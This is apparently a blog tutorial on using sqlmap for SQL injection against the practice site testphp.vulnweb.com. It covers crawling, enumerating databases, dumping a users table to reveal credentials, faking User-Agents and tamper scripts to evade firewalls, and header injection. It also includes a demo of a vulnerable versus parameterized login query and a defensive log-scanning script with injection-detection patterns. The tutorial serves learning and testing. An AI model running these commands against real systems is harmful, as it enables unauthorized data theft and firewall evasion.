
How to Use Sqlmap – Sqlmap Tutorials | SQL Injection

How to use SQLMAP to test a website for SQL Injection vulnerability (Sqlmap Tutorials)

In this article, we will look at a range of sqlmap commands and usage examples that are useful in different SQL injection scenarios.

sqlmap is included in practically every penetration-testing toolkit. It is one of the best-known and most powerful tools for exploiting SQL injection vulnerabilities, a class of flaw that itself tops the OWASP Top 10 risk list. It can be used for many purposes, from verifying that a target is exposed to SQL injection, to extracting databases, tables and columns, to gaining access to the complete underlying system.

What is SQL Injection?

SQL injection is a code injection technique in which the attacker supplies malicious SQL fragments through the web application so that they are executed by the application's database. With the right set of queries, the attacker can read the information stored in that database. sqlmap tests whether a given parameter (for example a GET parameter) is vulnerable to SQL injection.

The purpose of sqlmap is to detect and exploit SQL injection vulnerabilities; it is a scanning tool for this class of web application risk.

Once it detects one or more SQL injections on the target host, the user can choose among a variety of options: perform an extensive fingerprint of the back-end database management system, retrieve the DBMS session user and database, enumerate users, password hashes, privileges and databases, dump entire DBMS tables and columns or specific ones, run their own SQL statements, read specific files on the file system, and much more.

sqlmap is written in Python and is one of the best tools for performing SQL injection attacks.


SQL injection attack:

SQL (Structured Query Language) is the language programs use to access the data in a database. It also includes statements for updating or deleting data stored in database tables.

For end users, the entry point is a form on a web page or at the front of a piece of business software; an example is the field in which you type a query on the Google page. The backend captures the input the user entered on the form and wraps it into a SQL query.

Hackers have found ways to insert an entire SQL statement, or a clause of one, into the input field. This subverts the query-building logic behind the form, so that the input is executed as part of the SQL statement instead of being treated as the data the query was meant to look up.


SQL injection attacks can allow criminals to steal all the records or modify stored values. The ability to change data on a website lets attackers steal money: imagine that a customer could change their account balance from a negative amount to a positive one. In automated systems this can trigger a payout, and the criminals can collect the money before anyone in the business notices the mistake.
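The following Python snippet is an added example, not code from the article, showing the two behaviours described above side by side: a login query built by string concatenation, in which the user's input is parsed as part of the SQL, and the parameterized form, in which the same input is handled as plain data. The in-memory users table, the credentials and the test input are constructed for the demonstration.

```python
import sqlite3


def build_db():
    """Create a constructed in-memory users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (name, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """Glue the input into the SQL text: a quote in the input changes the query itself."""
    sql = f"SELECT id FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, name, password):
    """Bind the values through placeholders: the driver never parses them as SQL."""
    sql = "SELECT id FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


if __name__ == "__main__":
    conn = build_db()
    # Classic test input: closes the string literal and appends an always-true clause.
    injected = "' OR '1'='1"
    print("vulnerable    :", login_vulnerable(conn, "alice", injected))     # True (check bypassed)
    print("parameterized :", login_parameterized(conn, "alice", injected))  # False (literal text)
```

With the concatenated query the WHERE clause becomes `name = 'alice' AND password = '' OR '1'='1'`, which is true for every row, so the login succeeds without a password; with placeholders the same characters are compared as a password value and simply do not match.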

Overview:

Topics covered:

  • Techniques
  • Crawl
  • Enumeration
  • Batch
  • Risk
  • Level
  • Threads
  • Verbosity
  • Proxy
  • SQL injection via Burp Suite

Options covered:

  • -u
  • --forms
  • --data
  • --headers
  • --user-agent
  • --cookie
  • --flush-session
  • --output-dir
  • --tamper

Installation of Sqlmap

Install Sqlmap on Linux:

sudo apt-get install sqlmap -y

Install Sqlmap in Termux:

apt update -y
apt install git -y
apt install python2 -y
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python2 sqlmap.py

Video:

Hindi Videos: https://play.onlinehacking.xyz/v/VP5Yi3
English Videos: https://play.onlinehacking.xyz/v/fVX9sU

1. Crawl

Crawl is an important option that lets sqlmap crawl a website starting from a root location. The crawl depth can be given in the command.

Enter the number of link levels you want sqlmap to follow and scan:

sqlmap -u http://testphp.vulnweb.com/ --crawl 2

-u: target URL

  • crawl 1: http://www.example.com/news
  • crawl 2: http://www.example.com/news/newest/
  • crawl 3: http://www.example.com/news/newest/terror/
  • crawl 4: http://www.example.com/news/newest/terror/country/

2. Batch

The --batch option skips the prompts sqlmap shows. For example, while scanning the target you would be asked to answer y or n, or to enter values. With --batch these prompts are skipped and sqlmap uses the default answers.

The prompts appear at unpredictable points. When we scan something, sqlmap may ask for input: for example, when the crawl feature is used, the tool asks whether it should scan the URL it has found. When --batch is given, the tool continues with the default value without asking the user.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch

--batch: all questions are answered automatically with their defaults.

3. Techniques

The --technique option selects which injection techniques sqlmap tests; the default is BEUSTQ, meaning all of them. To restrict testing to a single technique, for example time-based blind, pass only that technique's letter. The command below tests union query-based injection only:

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --technique="U" --batch

  • B: Boolean-based blind
  • E: Error-based
  • U: Union query-based
  • S: Stacked queries
  • T: Time-based blind
  • Q: Inline queries

4. Threads

The --threads option sets the number of requests sqlmap sends concurrently, which reduces the total test time. The value should not be set too high, as that can affect the accuracy of the results.

Threads let you raise or lower the scan rate; the range is 1 to 10 threads.

With too many threads the results become unreliable; a lower thread count sends fewer requests at a time and collects more detailed information than the highest setting.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --threads 5

The default is 1 and the maximum is 10.

5. Risk

The --risk option controls which payloads the tool uses. Risk values range from 1 to 3; by default sqlmap uses risk 1.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --risk 1

6. Level

By default, sqlmap tests all the GET and POST parameters specified, but in some cases you may want to test additional entry points such as HTTP headers. Some of these can be specified with dedicated options, but the simplest way is the --level option. There are 5 levels in sqlmap (default level 1). Level 2 adds tests of the HTTP Cookie header, and level 3 adds the HTTP User-Agent and Referer headers.

The level determines how many checks and payloads the tool uses. Values range from 1 to 5; the default is 1, and level 5, the maximum, includes a large number of payloads and heavier SQL queries.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --level 2

7. Verbosity

If we want to see the payloads the tool sends, we can use the verbose option -v. The available levels are listed below.

With -v, the payloads sent are shown in a human-readable format.

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch -v 4

Verbosity levels:

  • 0: Show only Python tracebacks, errors, and critical messages.
  • 1: Show also information and warning messages.
  • 2: Show also debug messages.
  • 3: Show also payloads injected.
  • 4: Show also HTTP requests.
  • 5: Show also HTTP responses' headers.
  • 6: Show also HTTP responses' page content.

8. Database Enumeration

Since sqlmap is mostly used to exploit SQL injection, let's look at some database enumeration commands against a vulnerable application.

For database enumeration use the --dbs option, or the commands below, to access the database.

1. Find the current user, current database and current hostname (system name)

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-user --current-db --hostname --batch

  • --current-user: fetch the current user (identifies the current database user)
  • --current-db: fetch the current database (identifies the current database name)
  • --hostname: fetch the hostname (identifies the database server's hostname)

2. Find the names and details of all available databases

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

  • --dbs: fetch database names

3. Now we have the database name. To list all tables in the database "acuart", run the following command:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

  • -u: target URL, including the vulnerable parameter (id)
  • -D: select the database
  • --tables: list all the tables in that database

Now you can see the database tables.

4. To dump and save the data from the "users" table, use the following command:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump

  • -u: target URL, including the vulnerable parameter (id)
  • -D: select the database
  • -T: select the table
  • --dump: dump and save the table's contents

This reveals the login and password credentials.

9. HTTP Headers

I was wondering whether sqlmap can detect SQL injection vulnerabilities in HTTP headers. I know that with --level>=3 it automatically checks the User-Agent and Referer headers, but I would also like to check some others besides User-Agent, Cookie and Referer. You can set custom header fields with the --headers=HEADERS option, but in my test it did not test the given field; it only sent the given value.

I recently wrote a tool to test all HTTP header fields, but the number of tests it performs pales in comparison to sqlmap. It currently tests for error-based SQLi and also throws some null bytes into the header fields. However, it checks all default fields, including any custom fields.

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --headers="Referer:abc.com" -v 4 --batch

It appears custom header injection is supported; an asterisk marks the injection point:

  • --user-agent="sqlmap*"
  • --referer="target.com*"
  • --headers="User-Agent:test*\nReferer:bla"
  • --headers="Foo:bar*"
  • -r request.txt

10. User-Agent

Similarly, many pages are protected based on the User-Agent or Referer header. The same can be added to the command.

A firewall may detect and block your system based on its User-Agent; changing the User-Agent is one way to get past such a filter. Add any fake User-Agent:

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --user-agent="GECKO_Chrome" -v 4 --batch

Mobile User-Agent:

Add the --mobile option so that requests are sent with a mobile User-Agent:

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --mobile -v 4

sqlmap then asks which smartphone it should imitate through the HTTP User-Agent header:

  1. Apple iPhone 8 (default)
  2. BlackBerry Z10
  3. Google Nexus 7
  4. Google Pixel
  5. HP iPAQ 6365
  6. HTC 10
  7. Huawei P8
  8. Microsoft Lumia 950
  9. Nokia N97
  10. Samsung Galaxy S7
  11. Xiaomi Mi 3

The User-Agent was changed successfully and the firewall was bypassed without detecting the system.

11. Tamper (bypassing a WAF)

Most of the time we encounter a situation where the application sits behind a web application firewall (WAF). Check whether the site is protected by a WAF, then list the available tamper scripts:

sqlmap --list-tampers

Tamper scripts rewrite the SQL injection keywords (for example by encoding them) before the request is sent, so that the firewall does not recognise them. With --tamper=base64encode the payload is received base64-encoded:

sqlmap -u http://testphp.vulnweb.com/ --crawl 2 --batch --tamper=base64encode -v 3
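As an added example from the defender's side (not part of the article), the Python script below parses web-server access log lines in the common "combined" format and flags requests that look like sqlmap activity. It addresses the points of sections 10 and 11: it does not rely on the default sqlmap User-Agent alone (which --user-agent or --mobile replaces), but also looks for injection patterns in the percent-decoded query string and in the Referer header, and tries to base64-decode each parameter value so that a payload rewritten by a tamper script such as base64encode is still matched. The log lines, IP addresses, User-Agent strings and the burst threshold are constructed for the demonstration.

```python
import base64
import binascii
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fragments typical of automated SQL injection probing (matched case-insensitively).
INJECTION_RE = re.compile(
    r"union\s+(?:all\s+)?select"
    r"|\b(?:and|or)\s+\d+\s*=\s*\d+"
    r"|sleep\(|benchmark\(|waitfor\s+delay"
    r"|information_schema",
    re.IGNORECASE,
)


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decoded_views(path):
    """Yield the percent-decoded request path, then every parameter value that base64-decodes cleanly."""
    yield unquote_plus(path)
    for _, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        try:
            yield base64.b64decode(value, validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue  # not base64: nothing further to inspect for this value


def classify(entry):
    """Return the reasons one log entry looks like sqlmap activity (empty list if none)."""
    reasons = []
    if entry["ua"].lower().startswith("sqlmap"):
        reasons.append("default sqlmap User-Agent")
    if any(INJECTION_RE.search(view) for view in decoded_views(entry["path"])):
        reasons.append("SQL injection pattern in request")
    if INJECTION_RE.search(entry["referer"]):
        reasons.append("SQL injection pattern in Referer header")
    return reasons


def analyze(lines, burst_threshold=3):
    """Return (flagged entries, set of source IPs with at least burst_threshold flagged requests)."""
    hits = []
    per_ip = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["path"], reasons))
            per_ip[entry["ip"]] += 1
    noisy = {ip for ip, n in per_ip.items() if n >= burst_threshold}
    return hits, noisy


# Constructed sample log lines (not real traffic). The base64 value is generated here so the
# reader can see exactly what it decodes to.
ENCODED = base64.b64encode(b"1 UNION ALL SELECT NULL,NULL--").decode()
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /listproducts.php?cat=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 10; Pixel 4)"',
    '203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20NULL%2CNULL-- HTTP/1.1" 500 312 "-" "Mozilla/5.0 (Linux; Android 10; Pixel 4)"',
    f'203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /listproducts.php?cat={ENCODED} HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 10; Pixel 4)"',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 4980 "http://example.test/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /index.php HTTP/1.1" 200 2210 "abc.com\' AND SLEEP(5)--" "GECKO_Chrome"',
]

if __name__ == "__main__":
    hits, noisy = analyze(SAMPLE_LOG)
    for ip, path, reasons in hits:
        print(f"{ip} {path} -> {'; '.join(reasons)}")
    print("sources over burst threshold:", sorted(noisy))
```

Only one of the four requests from 203.0.113.7 carries the default sqlmap User-Agent; the other three are caught by the request and parameter checks, and the per-source counter turns the sequence into a single finding. The Referer check catches the header-based test that --level 3 or --headers produces, which a filter looking only at the URL would miss.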

12. Forms

The URL of a page containing a form (for example the login page) can be given with the --forms option; sqlmap parses the page and tests the form fields it finds.

Check the login page for vulnerable parameters:

sqlmap -u http://testphp.vulnweb.com/login.php --forms

Pages with a large number of form fields can be scanned by combining the --forms and --batch options. sqlmap then parses the page, tests the form fields and supplies the default input automatically.

If the entire application should be scanned, combine --crawl with --forms and --batch.

13. POST request

You can also save a request to a file. If you do not know how to capture a request from an application, learn the Burp Suite tool first.

Once the request is saved to a file, you can submit the POST request with the command below. This checks the same form as in section 12 (Forms):

sqlmap -u http://192.168.149.137/admin/userinfo.php --data="uname=abc&pass=123&login=submit" --dbs

14. Proxy

We can specify proxy details so that requests are routed through a proxy. To route the requests through a proxy tool such as Burp, start Burp Suite and configure it to listen on localhost port 8080, then use the following sqlmap command.

To run a proxied scan correctly, make sure the proxy address is set; here it is http://127.0.0.1:8080.

sqlmap sends its requests to Burp Suite, where you can modify each request before it is forwarded to the server:

sqlmap -u http://testphp.vulnweb.com/ --crawl 3 --proxy="http://127.0.0.1:8080" --batch

Open Burp Suite and check the request.

Conclusion:

I hope the sqlmap examples above helped you get to know this awesome SQL injection tool; the video version of the post is linked above. sqlmap is a great tool for finding and exploiting SQL injection vulnerabilities. With so many supported options and switches, and the ability to write and use custom scripts, it stands out among the open-source tools that test for SQL injection vulnerabilities.

Suman

Hello, I'm SUMAN from India. I'm currently working on cyber ethical hacking, penetration testing & bug bounty. I'm currently learning more about web design and Android ROMs.
